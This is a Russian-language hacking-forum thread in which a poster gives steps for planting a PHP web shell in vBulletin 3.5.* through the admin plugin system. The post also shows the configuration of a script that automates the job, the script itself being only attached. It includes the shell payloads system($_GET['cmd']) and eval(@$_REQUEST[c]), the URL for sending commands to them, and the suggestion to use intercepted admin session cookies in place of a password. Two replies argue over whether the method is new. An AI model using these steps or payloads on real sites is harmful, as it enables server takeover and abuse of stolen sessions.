Скрипт автовставки шелла в vBulletin через plugins

[DeusTirael]

Вот написал скрипт для автоматизации этого процесса.

Способ заливки шелла в vBulletin 3.5.*.
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

Настройка простейшая, нужно всего-лишь подставить свои данные.
Вместо логина и пароля можно подставить перехваченые куки админки.

$login = "admin";  //  admin login
$passw = "123";  //  admin password
$cookies = "";  //  or cpsession cookies
$admincp = "http://testing/vbl/admincp/";  //  admincp link
$pltitle = "plugin";  //  plugin title
$shellcode = 'eval(@$_REQUEST[c]);';  //  shell PHP code

Скрипт в аттаче.

 

[aka яП]

Вот написал скрипт для автоматизации этого процесса

Ты не первый кто такой скрипт написал ,уже подобное было .
https://forum.antichat.ru/showpost.php?p=185492&postcount=3
[mod][Одинокий Волк:] Смотри внимательнее что пишешь, где там скрипт? Там алгоритм который уже давно боян, а тема про скрипт![/mod]